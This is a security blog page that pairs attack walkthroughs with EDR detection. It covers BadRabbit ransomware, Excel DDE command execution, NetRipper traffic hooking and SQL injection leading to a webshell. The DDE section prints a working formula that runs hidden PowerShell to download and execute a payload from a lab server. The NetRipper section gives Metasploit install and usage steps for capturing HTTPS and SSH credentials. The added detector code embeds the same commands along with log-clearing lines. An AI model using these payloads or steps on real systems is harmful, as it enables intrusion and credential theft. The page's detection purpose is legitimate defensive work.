Articles, Blog Posts and Webinars

Webinars & Events

  • RSA: Log4Shell Attack Simulation & Response with NDR
  • RSA: Tips for Effective Threat Hunting
  • EuroOne CyberSecurity Summit: The SolarWinds Breach: The Tale of a Supply Chain Attack
  • MENA ISC: Improving the effectiveness of the SOC by operationalizing Threat Hunting & Incident Response

Blog Posts

BadRabbit

BadRabbit is a ransomware family that spread across Eastern Europe in late October 2017, hitting organizations mainly in Russia and Ukraine.

Once a machine is infected, the malware tries to spread laterally over SMB, logging in to neighbouring hosts with a hard-coded list of usernames and passwords and with credentials it dumps from memory using a Mimikatz-based module.

It then encrypts documents on the local machine, installs its own bootloader in place of the MBR and reboots, leaving a machine that cannot boot into Windows without the key the ransom note demands payment for.

The following are examples of the visibility an enterprise running RSA NetWitness Endpoint and RSA NetWitness Packets would have when one of its machines gets infected.

First, from the perspective of RSA NetWitness Packets, we can see the SMB traffic generated by the infected machine as it tries to log in to other hosts with a set of hard-coded usernames and passwords (full list available here: BadRabbit credential dictionary – Pastebin.com). The network-side tell is a single host cycling through many usernames against several neighbours within a few seconds, regardless of which credentials eventually work.

[Screenshot: netwitness-smb]
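Added example, not part of the original post and not RSA NetWitness code: the same network-side check expressed as a small Python detector over constructed SMB session-setup records. It generalises beyond BadRabbit's fixed dictionary: it keys on one source trying many distinct usernames in a short burst, against any number of targets, and lists the logins that succeeded inside the burst, since those are the hosts to isolate first. The record format, the thresholds and all addresses are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of SMB session-setup attempts (time, source, target,
# username, outcome). Not NetWitness output; the shape is what an NDR feed or
# normalized Windows 4624/4625 events would give you.
SAMPLE_SMB_LOG = """\
2017-10-24T13:02:01 10.0.0.25 10.0.0.40 Administrator FAILURE
2017-10-24T13:02:01 10.0.0.25 10.0.0.40 Admin FAILURE
2017-10-24T13:02:02 10.0.0.25 10.0.0.40 Guest FAILURE
2017-10-24T13:02:02 10.0.0.25 10.0.0.40 User FAILURE
2017-10-24T13:02:03 10.0.0.25 10.0.0.40 root FAILURE
2017-10-24T13:02:03 10.0.0.25 10.0.0.41 Administrator FAILURE
2017-10-24T13:02:04 10.0.0.25 10.0.0.41 Admin FAILURE
2017-10-24T13:02:04 10.0.0.25 10.0.0.41 Guest FAILURE
2017-10-24T13:02:05 10.0.0.25 10.0.0.41 User FAILURE
2017-10-24T13:02:05 10.0.0.25 10.0.0.41 root SUCCESS
2017-10-24T13:05:00 10.0.0.77 10.0.0.40 jsmith FAILURE
2017-10-24T13:05:09 10.0.0.77 10.0.0.40 jsmith SUCCESS
"""

WINDOW = timedelta(seconds=60)   # assumed: max gap between attempts of one burst
MIN_DISTINCT_USERS = 5           # assumed: tune to your environment


def parse_smb_log(text):
    """Parse the constructed format into (time, src, dst, user, outcome) tuples."""
    rows = []
    for line in text.splitlines():
        ts, src, dst, user, outcome = line.split()
        rows.append((datetime.fromisoformat(ts), src, dst, user, outcome))
    return sorted(rows)


def bursts(events, window):
    """Split one source's events into runs in which consecutive attempts are
    no more than `window` apart."""
    run = [events[0]]
    for ev in events[1:]:
        if ev[0] - run[-1][0] <= window:
            run.append(ev)
        else:
            yield run
            run = [ev]
    yield run


def detect_smb_spray(rows, window=WINDOW, min_users=MIN_DISTINCT_USERS):
    """One alert per (source, burst) in which the source tried at least
    `min_users` distinct usernames. Successful logins inside the burst are
    listed because those targets are now likely compromised too."""
    by_src = defaultdict(list)
    for row in rows:
        by_src[row[1]].append(row)
    alerts = []
    for src, events in by_src.items():
        for run in bursts(events, window):
            users = {e[3] for e in run}
            if len(users) < min_users:
                continue
            alerts.append({
                "source": src,
                "first_seen": run[0][0].isoformat(),
                "last_seen": run[-1][0].isoformat(),
                "distinct_users": len(users),
                "targets": sorted({e[2] for e in run}),
                "successful_logins": sorted({(e[2], e[3]) for e in run if e[4] == "SUCCESS"}),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_spray(parse_smb_log(SAMPLE_SMB_LOG)):
        print(alert)
```

The burst grouping matters more than the exact threshold: a worm walks the whole dictionary against each neighbour in seconds, while a user mistyping a password produces one username over a much longer span, so the second source in the sample never alerts.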


From the perspective of RSA NetWitness Endpoint, we can see the following.

We can identify the modules that are part of the attack:

[Screenshot: modules]

– B4DD.tmp is a Mimikatz build that dumps credentials from the memory of lsass.exe

– cscc.dat is a legitimately signed driver (the open-source DiskCryptor driver) that the malware abuses for the disk encryption

– shutdown.exe is the standard Windows utility, which the malware uses to restart the machine

By analyzing those modules we can get a bit more detail.

For example, by analyzing dispci.exe we can see the list of file extensions it targets for encryption:

[Screenshot: extensions]

As well as some of the encryption/decryption messages that will eventually pop up for the user:

[Screenshot: messages-dispci]

If we then look at the triggered IIOCs (Instant Indicators of Compromise) and behaviors:

[Screenshot: iiocs]

1- The process is reading a large number of documents in a short period of time (typical ransomware behavior, and a signal that does not depend on knowing the sample in advance)

2- The module is reported as malicious by the reputation service (ReversingLabs)

If we want more detail on what has happened, we can look at the tracking data:

[Screenshot: tracking1]

1- the different modules needed by the malware are dropped to disk

2- it removes any scheduled tasks left by a previous run of the malware (notice that the task names are the names of the dragons in Game of Thrones: viserion, rhaegal and drogon)

3- new scheduled tasks are added, one to run the encryption with the victim's ID and one to shut down the machine

4- we then see B4DD.tmp (Mimikatz) opening lsass.exe to dump credentials

5- it then opens every document whose extension is on the list, in order to encrypt it

[Screenshot: tracking2]

6- it then clears the event logs

7- and finally removes and re-adds the scheduled tasks that restart the machine
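Added example, not RSA NetWitness code: the tracking data above reduced to an ordered kill-chain check over constructed endpoint events. Rather than matching any single artefact, it scores a host on how many stages it exhibits: scheduled-task persistence that references shutdown.exe or dispci.exe, an lsass.exe handle opened by a process outside an allow-list, one process reading many distinct documents, and event-log clearing. The event shape, process names, command lines, allow-list and thresholds are assumptions that approximate the behaviour described above, not the screenshots' content.

```python
import re
from collections import defaultdict

# Constructed endpoint tracking events: (host, sequence, process, action,
# detail). The command lines approximate those reported for BadRabbit.
SAMPLE_EVENTS = [
    ("WS01", 1, "B4DD.tmp", "write_file", r"C:\Windows\cscc.dat"),
    ("WS01", 2, "cmd.exe", "process_create", "schtasks /Delete /F /TN rhaegal"),
    ("WS01", 3, "cmd.exe", "process_create",
     r'schtasks /Create /RU SYSTEM /SC ONCE /TN rhaegal /TR "C:\Windows\dispci.exe -id 1234"'),
    ("WS01", 4, "cmd.exe", "process_create",
     r'schtasks /Create /RU SYSTEM /SC ONCE /TN drogon /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f"'),
    ("WS01", 5, "B4DD.tmp", "open_process", "lsass.exe"),
] + [
    ("WS01", 10 + i, "rundll32.exe", "read_file", rf"C:\Users\bob\Documents\report{i}.docx")
    for i in range(25)
] + [
    ("WS01", 40, "cmd.exe", "process_create",
     "wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & fsutil usn deletejournal /D C:"),
    # Benign host: a service touching lsass and Word reading a couple of files.
    ("WS02", 1, "svchost.exe", "open_process", "lsass.exe"),
    ("WS02", 2, "WINWORD.EXE", "read_file", r"C:\Users\ann\Documents\notes.docx"),
    ("WS02", 3, "WINWORD.EXE", "read_file", r"C:\Users\ann\Documents\plan.docx"),
]

DOC_EXT = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt")
MASS_READ_THRESHOLD = 20                                              # assumed
LSASS_ALLOWED = {"svchost.exe", "csrss.exe", "wininit.exe", "lsm.exe"}  # assumed allow-list

STAGE_RULES = [  # (stage, action, regex applied to the event detail)
    ("persistence", "process_create",
     re.compile(r"schtasks\s+/create\b.*(?:shutdown\.exe|dispci\.exe)", re.I)),
    ("anti_forensics", "process_create",
     re.compile(r"wevtutil\s+cl\b|fsutil\s+usn\s+deletejournal", re.I)),
]


def host_stages(events):
    """Kill-chain stages seen on one host, in the order they first appear."""
    stages = []
    docs_read = defaultdict(set)

    def mark(stage):
        if stage not in stages:
            stages.append(stage)

    for _host, _seq, proc, action, detail in sorted(events, key=lambda e: e[1]):
        for stage, rule_action, pattern in STAGE_RULES:
            if action == rule_action and pattern.search(detail):
                mark(stage)
        if (action == "open_process" and detail.lower() == "lsass.exe"
                and proc.lower() not in LSASS_ALLOWED):
            mark("credential_access")
        if action == "read_file" and detail.lower().endswith(DOC_EXT):
            docs_read[proc].add(detail)
            if len(docs_read[proc]) >= MASS_READ_THRESHOLD:
                mark("mass_document_read")
    return stages


def detect_ransomware_chain(events, min_stages=3):
    """Hosts that exhibit at least `min_stages` of the chain, with the stages."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev[0]].append(ev)
    verdicts = {host: host_stages(evs) for host, evs in by_host.items()}
    return {h: s for h, s in verdicts.items() if len(s) >= min_stages}


if __name__ == "__main__":
    print(detect_ransomware_chain(SAMPLE_EVENTS))
```

Requiring several stages is what keeps this usable: an lsass handle alone or a burst of document reads alone is routine on many hosts, but a machine that shows persistence, credential access, mass reads and log clearing in sequence is worth isolating before the scheduled reboot fires.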


Once the machine has restarted, the victim cannot boot into Windows and gets the following message:

[Screenshot: ransom message displayed at boot]

This shows how RSA NetWitness Packets and Endpoint can provide early notification and detection of new malware families without relying on known signatures, and how the IOCs and behaviors above can be searched for to quickly identify compromised machines and respond.

MS Excel Command Execution Without Macros

A method of executing commands from malicious Excel files (and other Office documents) without macros has recently resurfaced.

The method uses Dynamic Data Exchange (DDE). What makes it interesting is that, even though it does cause prompts to appear, it does not use macros, so it is less likely to be detected and blocked by controls that key on VBA, and users are more likely to accept the prompts. DDE is a documented feature rather than a vulnerability, so at the time of writing there is no patch that removes it, and it cannot easily be prevented or blocked. (Microsoft has since published advisory ADV170021, which documents registry values that disable DDE in the Office applications; for Excel they live under HKCU\Software\Microsoft\Office\<version>\Excel\Security, e.g. DisableDDEServerLaunch=1 and DisableDDEServerLookup=1.)

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and put the following formula in one of the cells (the quotes are plain ASCII single quotes; the cell reference after the ! is arbitrary):

=cmd|' /c notepad'!A0

Once the user opens the file and accepts the prompts, Excel starts cmd.exe, which launches notepad.exe.

To make the attack more interesting, we use the same method in conjunction with PowerShell to download and execute our payload (the payload "YGH.exe" is hosted on the "192.168.1.3" server):

=cmd|'/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile("http://192.168.1.3/YGH.exe","c:\Users\Public\YGH.exe");Start-Process "c:\Users\Public\YGH.exe"'!A0

Once the victim opens the file, Excel shows a first warning about links to external data sources.

After accepting the 1st warning message, the victim sees a 2nd warning asking whether the external application (cmd.exe) should be started.

After accepting that as well, the payload gets downloaded and executed.

In a real-life scenario, the malware would do something more stealthy, or provide remote access to the attacker, instead of displaying a message.

Detection Using RSA NetWitness Endpoint (EDR)

Now, from the RSA NetWitness Endpoint view, this is detected very easily:

  1. IIOCs are triggered for an Office application running PowerShell and for PowerShell downloading content. These can be used to generate real-time alerts via email and/or syslog and get notified at an early stage of the attack.
  2. Excel is executed
  3. Excel launches "cmd.exe". From the command arguments we can see that cmd is used to launch PowerShell to download and execute a file called "YGH.exe" from the "192.168.1.3" server.
  4. PowerShell saves the YGH.exe file to disk
  5. PowerShell executes the YGH.exe file
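Added example, not the page's or RSA's code: the process-tree logic behind items 1 to 3 above, run over constructed process-creation records of the kind Sysmon or an EDR produces. It walks ancestry rather than looking only at the direct parent, so it catches the cmd.exe that Excel launches, the PowerShell that cmd spawns, and the downloaded executable started beneath them, and grades each finding on download and evasion indicators in the command line. Process IDs, image paths, the LOLBin list and the benign control chain are assumptions; the DDE command line is the one used in the walkthrough.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                 "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
                         r"start-bitstransfer|https?://", re.I)
EVASION_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-nop\b|bypass", re.I)

# Constructed process-creation records (Sysmon event 1 / EDR tracking shape).
SAMPLE_PROCS = [
    Proc(1200, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(3100, 1200, r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE", '"EXCEL.EXE" invoice.xlsx'),
    Proc(3250, 3100, r"C:\Windows\System32\cmd.exe",
         r'cmd /c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile("http://192.168.1.3/YGH.exe","c:\Users\Public\YGH.exe");Start-Process "c:\Users\Public\YGH.exe"'),
    Proc(3260, 3250, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile("http://192.168.1.3/YGH.exe","c:\Users\Public\YGH.exe");Start-Process "c:\Users\Public\YGH.exe"'),
    Proc(3300, 3260, r"C:\Users\Public\YGH.exe", r"c:\Users\Public\YGH.exe"),
    # Benign control: a user opens a console from the desktop and runs a cmdlet.
    Proc(4000, 1200, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    Proc(4100, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-Process"),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Process records from `pid` up to the root, child first. Stops at an
    unknown parent or at a pid-reuse loop."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def find_office_chains(procs):
    """Flag (a) shells/LOLBins with an Office ancestor, however many hops up,
    and (b) any other executable started beneath such a shell."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        chain = ancestry(by_pid, p.pid)
        ancestors = chain[1:]
        office = next((a for a in ancestors if basename(a.image) in OFFICE_APPS), None)
        if office is None:
            continue
        between = ancestors[:ancestors.index(office)]
        if basename(p.image) in LOLBIN_SHELLS:
            kind = "office_spawned_shell"
        elif any(basename(a.image) in LOLBIN_SHELLS for a in between):
            kind = "payload_via_office_shell"
        else:
            continue
        indicators = [name for name, rx in (("download", DOWNLOAD_RE), ("evasion", EVASION_RE))
                      if rx.search(p.cmdline)]
        findings.append({
            "pid": p.pid, "kind": kind, "image": basename(p.image),
            "office_parent": basename(office.image),
            "chain": [basename(a.image) for a in reversed(chain)],
            "indicators": indicators,
            "severity": "high" if indicators or kind == "payload_via_office_shell" else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_office_chains(SAMPLE_PROCS):
        print(finding)
```

Walking the full ancestry is what makes the rule survive trivial variations: whether DDE starts cmd.exe, which starts PowerShell, or a future variant starts a different LOLBin, the Office process is still somewhere above it, and the dropped payload is still flagged even though its direct parent is only powershell.exe.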


This shows how an attack vector that easily bypasses traditional preventive controls can be detected by RSA NetWitness Endpoint from the behavior observed on the user's workstation.

It was detected even though Excel is approved software with a valid, trusted signature and the payload itself did nothing malicious (it only showed a message to the victim). This is early, behavior-based detection before the negative impact actually happens.

Post Exploitation – Sniff a Target’s Encrypted Traffic in Clear-Text

NetRipper is a post-exploitation tool for Windows that uses API hooking to intercept network and encryption-related functions inside a target process, running as a low-privileged user. Because it sits inside the process, it captures plain-text traffic as well as encrypted traffic before encryption and after decryption.

In practice this allows the attacker to read the target's HTTPS and SSH traffic in clear-text, and so to collect additional information such as the usernames and passwords the user types into web applications (over HTTPS) or network devices (over SSH).

In this example we will see how to perform this attack using NetRipper (assuming the attacker already has a meterpreter shell), and then how an EDR tool such as RSA NetWitness Endpoint can help detect it.

We are using:
– Kali Linux as the attacker's machine
– Windows 7 with McAfee Antivirus as the victim (the same technique works on Windows 10 as well)

Installation of NetRipper for Metasploit on Kali

Run the following commands on the Kali box, from the directory of the NetRipper repository that holds netripper.rb and netripper.cpp (the compiled Windows DLL is taken from the sibling Release folder), to install NetRipper and make it available within Metasploit:

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
cd ../Release
cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

Launch the Attack

We will assume that the attacker already has a meterpreter shell.

[Screenshot: 01-meterpreter shell]

The attacker connects to the available session with "sessions -i 1" and lists the running processes with "ps":

[Screenshot: 02-ps processes]

From here the attacker can see that firefox.exe and putty.exe are currently running.

The attacker now decides to use NetRipper to sniff Firefox's network traffic in clear-text, even though HTTPS is used.
The module is loaded with: use post/windows/gather/netripper
The options it needs are listed with: show options

[Screenshot: 03-use netripper]

The attacker needs to:
– set the session ID to use (session 1 from the list of available sessions): set SESSION 1
– set the process names (or process IDs) to hook: set PROCESSNAMES firefox.exe,putty.exe

The module is then run with: exploit

[Screenshot: 04-exploit]

Now that the hooks are in place, NetRipper captures the traffic of those processes in clear-text and writes it to files on the victim's machine, by default under the current user's TEMP folder (changeable with the DATAPATH option):

[Screenshot: 07-list folder]

The victim now authenticates to a web application over HTTPS. In this example we use Gmail, but it could be any site.

[Screenshot: 06-gmail-password]

The attacker then reads the firefox.exe_PR_Write.txt file. PR_Write is the NSPR function Firefox calls with the outgoing data before it is encrypted, so even though the victim used HTTPS, the attacker sees both the username (someone@gmail.com) and the password (password123) in clear-text.

[Screenshot: 08-output]

The same can be done with Chrome, PuTTY, SecureCRT, WinSCP, Lync, Outlook …
It is also not limited to login information: anything sent or received by the hooked process is captured.
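Added illustration, not NetRipper's code and not how NetRipper is implemented (it injects a DLL and patches the target's functions in memory): the same idea of interposing on the function that receives plaintext before encryption, simulated in Python by swapping a method on a stand-in TLS client, followed by the integrity check that lets an EDR report hooked symbols and the module that owns them, as in the detection section that follows. The client, its toy keystream cipher and the session key are assumptions; the captured credentials are the sample values from the screenshots above.

```python
import hashlib


class TlsClient:
    """Stand-in for an application's TLS layer (think PR_Write in Firefox's
    NSPR, or SSL_write in OpenSSL): plaintext goes in, only ciphertext reaches
    the wire. The cipher is a toy SHA-256 keystream, not TLS."""

    def __init__(self, key):
        self._key = key
        self._msg_no = 0
        self.wire = []          # what a network sniffer would see

    def _keystream(self, n):
        out, block = b"", 0
        while len(out) < n:
            out += hashlib.sha256(self._key + self._msg_no.to_bytes(4, "big")
                                  + block.to_bytes(4, "big")).digest()
            block += 1
        return out[:n]

    def write(self, data):      # the pre-encryption choke point a hook targets
        frame = bytes(b ^ k for b, k in zip(data, self._keystream(len(data))))
        self.wire.append(frame)
        self._msg_no += 1
        return len(data)


def install_hook(cls, name, sink):
    """Attacker side: replace the function with a trampoline that copies the
    plaintext to `sink` and then calls the original, so nothing breaks."""
    original = getattr(cls, name)

    def hooked(self, data, *args, **kwargs):
        sink.append(bytes(data))
        return original(self, data, *args, **kwargs)

    setattr(cls, name, hooked)
    return original


def code_fingerprint(fn):
    return hashlib.sha256(fn.__code__.co_code).hexdigest()


def baseline(cls, names):
    """Defender side, step 1: fingerprint the clean functions (the EDR analogue
    is comparing a module's in-memory exports with its on-disk copy)."""
    return {n: code_fingerprint(getattr(cls, n)) for n in names}


def detect_hooks(cls, base):
    """Defender side, step 2: report every symbol whose code no longer matches,
    together with the code that now owns it."""
    hooked = {}
    for name, fingerprint in base.items():
        fn = getattr(cls, name)
        if code_fingerprint(fn) != fingerprint:
            hooked[name] = {"owner": f"{fn.__module__}.{fn.__qualname__}",
                            "code_name": fn.__code__.co_name}
    return hooked


def run_scenario():
    base = baseline(TlsClient, ["write"])          # taken while the process is clean
    clean_scan = detect_hooks(TlsClient, base)
    captured = []
    original = install_hook(TlsClient, "write", captured)
    client = TlsClient(key=b"per-session key")
    secret = b"user=someone@gmail.com&pass=password123"
    client.write(secret)
    after_scan = detect_hooks(TlsClient, base)
    setattr(TlsClient, "write", original)          # restore for other callers
    return {
        "clean_scan": clean_scan,
        "captured_plaintext": captured,
        "plaintext_on_wire": any(secret in frame for frame in client.wire),
        "hooked_after": after_scan,
    }


if __name__ == "__main__":
    print(run_scenario())
```

Two points carry over to the real thing: the credential never appears on the wire, so a network sensor cannot see this attack, and the hook is detectable only by comparing the function actually in use against a trusted copy, which is what the "hooked symbols" and "hooked module names" in the EDR output correspond to.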


Detection Using an EDR Solution

Now that we have seen how easily an attacker can sniff encrypted traffic from the user via process hooking, without being stopped by the victim's antivirus, we will see how to detect it using an EDR solution such as RSA NetWitness Endpoint.

In the screenshot below, we can see how RSA NWE reports:
– the hooked process (firefox.exe)
– the hooked module names
– the hooked symbols
– an elevated IIOC score
– the list of IIOCs that have been triggered

[Screenshot: 08-ECAT-IIOC]

In addition, by pulling the injected module and doing static analysis on it, we can see references to NetRipper and to the files and folders used by the tool.

[Screenshot: 09-ECAT-Analyze]

From SQL Injection to WebShell

An SQL injection is not limited to dumping a database: if the database account has the right privileges, it can also let the attacker write files to the web server and consequently gain remote access via a WebShell.

WebShells receive commands from the attacker mainly in one of 2 ways:

  • via GET requests, which are easy to spot in web-server logs and SIEM solutions because the commands are visible in the URL
  • via POST requests, which are stealthier because the commands travel in the request body, which access logs do not record
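Added example, not part of the original tutorial: a small detector over constructed web-server access-log lines that shows the two cases above side by side. GET-based shells leak their commands into the query string, so the rule can quote them; POST-based shells leave only the path, so the best the log can give you is a cluster of referer-less POSTs to a script in a directory the web server can write to, which then has to be confirmed on the host. The log lines, the writable-directory list and the parameter names are assumptions; the file names are stand-ins for what sqlmap and b374k drop.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed access-log lines: a DVWA-style target, a GET-based shell and a
# POST-based shell both dropped into the uploads directory, plus normal logins.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [12/Nov/2017:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201=1--%20&Submit=Submit HTTP/1.1" 200 4531 "http://dvwa.local/dvwa/" "sqlmap/1.1"
203.0.113.5 - - [12/Nov/2017:10:03:10 +0000] "GET /dvwa/hackable/uploads/tmpu4f2c.php?cmd=whoami HTTP/1.1" 200 87 "-" "sqlmap/1.1"
203.0.113.5 - - [12/Nov/2017:10:03:11 +0000] "GET /dvwa/hackable/uploads/tmpu4f2c.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 2410 "-" "sqlmap/1.1"
203.0.113.5 - - [12/Nov/2017:10:05:40 +0000] "POST /dvwa/hackable/uploads/b374k.php HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Nov/2017:10:05:41 +0000] "POST /dvwa/hackable/uploads/b374k.php HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Nov/2017:10:05:45 +0000] "POST /dvwa/hackable/uploads/b374k.php HTTP/1.1" 200 980 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Nov/2017:10:06:00 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Nov/2017:10:06:05 +0000] "POST /dvwa/login.php HTTP/1.1" 302 0 "http://dvwa.local/dvwa/login.php" "Mozilla/5.0"
"""

WRITABLE_DIRS = ("/uploads/", "/tmp/", "/images/")   # assumed: web-user writable paths
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp")
CMD_PARAMS = {"cmd", "c", "command", "exec", "e", "run"}
CMD_RE = re.compile(r"\b(?:whoami|id|uname|cat|ls|dir|net\s+user|ipconfig|ifconfig|wget|curl|powershell)\b", re.I)
MIN_OPAQUE_POSTS = 2


def parse_access_log(text):
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def detect_webshells(entries, min_posts=MIN_OPAQUE_POSTS):
    findings = []
    opaque = Counter()
    for e in entries:
        url = urlsplit(e["url"])
        path = url.path.lower()
        if not path.endswith(SCRIPT_EXT):
            continue
        if e["method"] == "GET":
            # Commands are in the URL: quote them as evidence.
            hits = [f"{k}={unquote(v)}" for k, v in parse_qsl(url.query, keep_blank_values=True)
                    if k.lower() in CMD_PARAMS or CMD_RE.search(unquote(v))]
            if hits:
                findings.append({"type": "get_webshell_command", "ip": e["ip"],
                                 "path": url.path, "evidence": hits})
        elif (e["method"] == "POST" and any(d in path for d in WRITABLE_DIRS)
              and e["referer"] in ("-", "")):
            # Body is not logged: all we can count is the access pattern.
            opaque[(e["ip"], url.path)] += 1
    for (ip, path), n in opaque.items():
        if n >= min_posts:
            findings.append({"type": "post_webshell_candidate", "ip": ip, "path": path,
                             "evidence": [f"{n} referer-less POSTs; request body not logged"]})
    return findings


if __name__ == "__main__":
    for finding in detect_webshells(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(finding)
```

The asymmetry in the output is the point of the section: the GET findings carry the exact commands, while the POST finding is only a lead that needs host-side confirmation (a new .php file in the upload directory, or the web server's process spawning a shell).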

In this tutorial we will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL injections, we will use DVWA (Damn Vulnerable Web Application), a web application purposely built with vulnerabilities and weaknesses for pen-testing practice.


Fileless Infection Using Metasploit and PowerShell

Fileless malware is a technique for compromising a system without writing a payload to disk, which keeps the attack stealthy and lets it evade some antivirus, EPP and EDR products.

We will look at how to test this type of attack and then at ways to detect it.
